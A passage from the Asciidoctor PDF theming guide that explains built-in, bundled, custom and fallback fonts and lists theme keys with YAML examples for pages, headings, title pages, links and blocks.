Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font-family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font-family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters you can use in your document are limited to the characters in the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\n\nWARNING: Built-in (AFM) fonts do not use the <<fallback-fonts,fallback fonts>>.\nIn order for the fallback font to kick in, you must be using a TrueType font.\n\n.WINANSI Encoding Behavior\n****\nWhen using the built-in PDF (AFM) fonts on a block of content in your AsciiDoc document, any character that cannot be encoded to WINANSI is replaced with a logic \"`not`\" glyph (`¬`) and you'll see the following warning in your console:\n\n The following text could not be fully converted to the Windows-1252 character set:\n | <string with unknown glyph>\n\nThis behavior differs from the default behavior in Prawn, which is to simply crash.\n\nYou'll often see this warning if you're using callouts in your document and you haven't specified a TrueType font in your theme.\nTo prevent this warning, you need to specify a TrueType font.\n\nWhen using a TrueType font, you will get no warning for a missing glyph.\nThat's a consequence of how Prawn works and is outside of Asciidoctor PDF's control.\n\nFor more information about how Prawn handles character encodings for built-in fonts, see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/CHANGELOG.md#vastly-improved-handling-of-encodings-for-pdf-built-in-afm-fonts[this note in the Prawn CHANGELOG].\n****\n\n=== Bundled Fonts\n\nAsciidoctor PDF bundles several fonts that are used by the default theme.\nYou can also use these fonts in your custom theme by simply declaring them.\nThese fonts provide more characters than the built-in PDF fonts, but still only a subset of UTF-8 (to reduce the size of the gem).\n\nThe family name of the fonts bundled with Asciidoctor PDF are as follows:\n\nhttp:\/\/www.google.com\/get\/noto\/#\/family\/noto-serif[Noto Serif]::\nA serif font that can be styled as normal, italic, bold or bold_italic.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1mn[M+ 1mn]::\nA monospaced font that maps different thicknesses to the styles normal, italic, bold and bold_italic.\nAlso provides the circuled numbers used in callouts.\n\nhttp:\/\/mplus-fonts.osdn.jp\/mplus-outline-fonts\/design\/index-en.html#mplus_1p[M+ 1p Fallback]::\nA sans-serif font that provides a very complete set of Unicode glyphs.\nCannot be styled as italic, bold or bold_italic.\nUsed as the fallback font in the `default-with-fallback-font` theme.\n\nCAUTION: At the time of this writing, you cannot use the bundled fonts if you change the value of the `pdf-fontsdir` attribute (and thus define your own custom fonts).\nThis limitation may be lifted in the future.\n\n=== Custom Fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, find the TTF file collection for the font you want to use.\nA collection typically consists of all four font styles:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font dynamically like a browser can, so the italic styles are required._\n\nIn order for a third-party font to work properly with Prawn (and hence Asciidoctor PDF), several modifications are required.\nSee <<Prepare a Custom Font>> to learn how to prepare your font for use with Asciidoctor PDF.\n\nOnce you've obtained the TTF files, put them in the directory inside your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nRename the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font-catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key that you assign to the font in the font catalog anywhere the `font-family` property is accepted in the theme file.\nFor example, to use the Roboto font for all headings, use:\n\n[source,yaml]\n----\nheading:\n font-family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-theme=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nTIP: When Asciidoctor PDF creates the PDF, it only embeds the glyphs from the font that are needed to render the characters present in the document.\nEffectively, it subsets the font.\nWhile that saves space taken up by the generated PDF, you may still be storing the full font in your source repository.\nTo minimize the size of the source font, you can use {url-fontforge}[FontForge] to subset the font ahead of time.\nSubsetting a font means remove glyphs you don't plan to use.\nDoing so it not a requirement, simply a personal preference.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n Roboto Light:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\nText in SVGs will use the font catalog from your theme.\nWe recommend that you match the font key in your theme file to the name of the font seen by the operating system.\nThis will allow you to use the same font names (aka families) in both your graphics program and Asciidoctor PDF, thus making them portable.\n\n=== Fallback Fonts\n\nIf a TrueType font is missing a character needed to render the document, such as a special symbol, you can have Asciidoctor PDF look for the character in a fallback font.\nYou only need to specify a single fallback font, typically one that provides a full set of symbols.\n\nIMPORTANT: The fallback font only gets used when the primary font is a TrueType font (i.e., TTF, DFont, TTC).\nAny glyph missing from an AFM font is simply replaced with the \"`not`\" glyph (`¬`).\n\nCAUTION: The `default` theme does not use a fallback font.\nHowever, the built-in `default-with-fallback-font` theme does.\nUsing the fallback font slows down PDF generation slightly because it has to analyze every single character.\nIt's use is not recommended for large documents.\nInstead, it's best to select primary fonts that have all the characters you need.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/github.com\/android\/platform_frameworks_base\/blob\/master\/data\/fonts\/DroidSansFallback.ttf[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, add the key name to the `fallbacks` key under the `font-catalog` key.\nThe `fallbacks` key accepts an array of values, meaning you can specify more than one fallback font.\nHowever, we recommend using a single fallback font, if possible, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks:\n - DroidSansFallback\n----\n\nTIP: If you are using more than one fallback font, add additional lines to the `fallbacks` key.\n\nOf course, make sure you've configured your theme to use your custom font:\n\n[source,yaml]\n----\nbase:\n font-family: Roboto\n----\n\nThat's it!\nNow you're covered.\nIf your custom TTF font is missing a glyph, Asciidoctor PDF will look in your fallback font.\nYou don't need to reference the fallback font anywhere else in your theme file.\n\n== Keys\n\nThis section lists all the keys that are available when creating a custom theme.\nThe keys are organized by category.\nEach category represents a common prefix under which the keys are typically nested.\n\nTIP: Keys can be nested wherever an underscore (`_`) or hyphen (`-`) appears in the name.\nThis nested structure is for organizational purposes only.\nAll keys are flatted when the theme is loaded (e.g., `align` nested under `base` becomes `base-align`).\n\nThe converter uses the values of these keys to control how most elements are arranged and styled in the PDF.\nThe default values listed in this section get inherited from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme].\n\nIMPORTANT: The https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] has a different set of values which are not shown in this guide.\n\nWhen creating a theme, all keys are optional.\nRequired keys are provided by the base theme.\nTherefore, you only have to declare keys that you want to override.\n\n[#keys-extends]\n=== Extends\n\nA theme can extend another theme using the `extends` key.\nFor example:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nThe extends key accepts either a single value or an array of values.\nEach value is interpreted as a filename.\nIf the filename equals `default`, it resolves to the location of the default (built-in) theme.\nIf the filename is absolute, it's used as is.\nIf the filename begins with `.\/`, it's resolved as a theme file relative to the current theme file.\nOtherwise, the filename is resolved as a theme file in the normal way (relative to the value of the `pdf-themesdir` attribute).\n\nCurrently, the base theme is always loaded first.\nThen, the files referenced by the extends key are loaded in order.\nFinally, the keys in the current file are loaded.\nEach time a theme is loaded, the keys are overlaid onto the keys from the previous theme.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|extends\n|String or Array\n(default: [])\n|extends:\n- default\n- .\/brand-theme.yml\n|===\n\n[#keys-role]\n=== Role\n\nThe keys in the `role` category define custom roles for formatting.\nThe name of the role is the first subkey level.\nThe role name may not contain a hyphen or underscore.\nThe keys under the role are the concrete theming properties.\n\nHere's an example of a role for making text red:\n\n[source,yaml]\n----\nrole:\n red:\n font-color: #ff0000\n----\n\nThis role can be used as follows:\n\n[source,asciidoc]\n----\nError text is shown in [.red]#red#.\n----\n\nCurrently, custom roles only apply to inline phrases and only support changing the font properties.\n\nThe converter provides several predefined roles.\nThe `big` and `small` roles map the font size to the $base_font_size_large and $base_font_size_small values, respectively.\nThese two roles can be redefined.\nThe `underline` and `line-through` roles add the underline and strikethrough decorations, respectively.\nThese two roles _can't_ be redefined.\nThe color roles (e.g., `blue`), which you may be familiar with from the HTML converter, are not mapped by default.\nYou'll need to define these in your theme if you'd like to make use of them when converting to PDF.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-role]*Key Prefix:* <<key-prefix-role,role-<name> >>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|role:\n red:\n font-color: #ff0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|role:\n label:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|role:\n large:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|role:\n heavy:\n font-style: bold\n|===\n\n[#keys-page]\n=== Page\n\nThe keys in this category control the size, margins and background of each page (i.e., canvas).\nWe recommended that you define this category before all other categories.\n\nNOTE: The background of the title page can be styled independently.\nSee <<Title Page>> for details.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-page]*Key Prefix:* <<key-prefix-page,page>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: #ffffff)\n|page:\n background-color: #fefefe\n\n|background-image^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|page:\n background-image: image:page-bg.png[]\n\n|background-image-(recto{vbar}verso)^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|page:\n background-image:\n recto: image:page-bg-recto.png[]\n verso: image:page-bg-verso.png[]\n\n|layout\n|portrait {vbar} landscape +\n(default: portrait)\n|page:\n layout: landscape\n\n|margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 36)\n|page:\n margin: [0.5in, 0.67in, 1in, 0.67in]\n\n|margin-inner^[3]^\n|<<measurement-units,Measurement>> +\n(default: 48)\n|page:\n margin-inner: 0.75in\n\n|margin-outer^[3]^\n|<<measurement-units,Measurement>> +\n(default: 24)\n|page:\n margin-outer: 0.59in\n\n|size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width,height]>> +\n(default: A4)\n|page:\n size: Letter\n\n|numbering-start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|page:\n numbering-start-at: toc\n|===\n\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf you flatten out the keys (e.g., `page-background-recto`), you can also set the default page background image (`page-background`), which will then be used as a fallback if a background image isn't specified for a side.\nTo disable the background for a side, use the value `none`.\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. The margins for `recto` (right-hand, odd-numbered) and `verso` (left-hand, even-numbered) pages are calculated automatically from the margin-inner and margin-outer values.\nThese margins and used when the value `prepress` is assigned to the `media` document attribute.\n\n[#keys-base]\n=== Base\n\nThe keys in this category provide generic theme settings and are often referenced throughout the theme file as variables.\nWe recommended that you define this category after the page category and before all other categories.\n\nNOTE: While it's common to define additional keys in this category (e.g., `base-border-radius`) to keep your theme DRY, we recommend using <<Custom Variables,custom variables>> instead.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-base]*Key Prefix:* <<key-prefix-base,base>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|base:\n align: justify\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|base:\n border-color: #eeeeee\n\n\/\/ border-radius is variable, not an official key\n\/\/|border-radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font-family: Noto Serif\n\n|font-kerning\n|normal {vbar} default +\n(default: normal)\n|base:\n font-kerning: none\n\n|font-size\n|<<values,Number>> +\n(default: 12)\n|base:\n font-size: 10.5\n\n\/\/ font-size-large is a variable, not an official key\n\/\/|font-size-large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-large: 13\n\n|font-size-min\n|<<values,Number>> +\n(default: 9)\n|base:\n font-size-min: 6\n\n\/\/ font-size-small is a variable, not an official key\n\/\/|font-size-small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-small: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font-style: normal\n\n|text-transform^[1]^\n|none +\n(default: none)\n|base:\n text-transform: none\n\n|line-height-length^[2]^\n|<<values,Number>> +\n(default: _not set_)\n|base:\n line-height-length: 12\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line-height: >\n $base-line-height-length \/\n $base-font-size\n|===\n\n. The `text-transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. The `line-height-length` is a pseudo property that's local the theme.\nIt's often used for computing the `base-line-height` from the base font size and the desired line height size.\nFor instance, if you set `base-line-height-length`, you can use `$base-line-height-length \/ $base-font-size` to set the value of `base-line-height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical-spacing\n|<<values,Number>> +\n(default: 12)\n|vertical-spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font-color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font-color: #428bca\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font-family: Roboto\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text-decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n background-color: #f5f5f5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|literal:\n border-offset: 2\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|literal:\n border-radius: 3\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|literal:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font-color: #b12146\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font-style: bold\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\nThe border only works properly if the literal phrase does not have nested formatting.\nOtherwise, the border will be inherited, producing a less than desirable result.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, sections titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|heading:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font-color: #222222\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|heading:\n font-family: Noto Serif\n\n\/\/ NOTE: heading-font-size is overridden by h<n>-font-size in base theme\n\/\/|font-size\n\/\/|<<values,Number>> +\n\/\/(default: $base-font-size)\n\/\/|heading:\n\/\/ font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line-height: 1.2\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin-top: $vertical-spacing * 0.2\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin-bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading-h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-align)\n|heading:\n h2-align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-font-color)\n|heading:\n h2-font-color: [0, 99%, 100%, 0]\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-font-family)\n|heading:\n h4-font-family: Roboto\n\n|font-size^[1]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6-font-size: $base-font-size * 1.7\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-font-style)\n|heading:\n h3-font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-text-transform)\n|heading:\n text-transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title-page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title-page:\n align: right\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n background-color: #eaeaea\n\n|background-image^[1]^\n|image macro^[2]^ +\n(default: _not set_)\n|title-page:\n background-image: image:title.png[]\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|title-page:\n line-height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title-page-logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title-page:\n logo:\n align: right\n\n|image\n|image macro^[2]^ +\n(default: _not set_)\n|title-page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[3]^ +\n(default: 10%)\n|title-page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title-page-title>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n title:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 18)\n|title-page:\n title:\n font-size: $heading-h1-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n title:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n title:\n line-height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title-page:\n title:\n top: 55%\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title-page-subtitle>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 14)\n|title-page:\n subtitle:\n font-size: $heading-h3-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n subtitle:\n line-height: 1\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title-page-authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n authors:\n delimiter: '; '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n authors:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title-page:\n authors:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n authors:\n margin-bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title-page-revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n revision:\n delimiter: ': '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-size: $base-font-size-small\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n revision:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-bottom: 5\n|===\n\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`).\nThe size of the background can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin-top: 0\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin-bottom: $vertical-spacing\n\n|margin-inner^[1]^\n|<<measurement-units,Measurement>> +\n(default: $prose-margin-bottom)\n|prose:\n margin-inner: 0\n\n|text-indent\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|prose:\n text-indent: 18\n|===\n\n. Controls the margin between adjacent paragraphs.\nUseful when using indented paragraphs.\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin-bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text-transform: uppercase\n\n|margin-inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin-inside: 3\n\n|margin-outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin-outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not 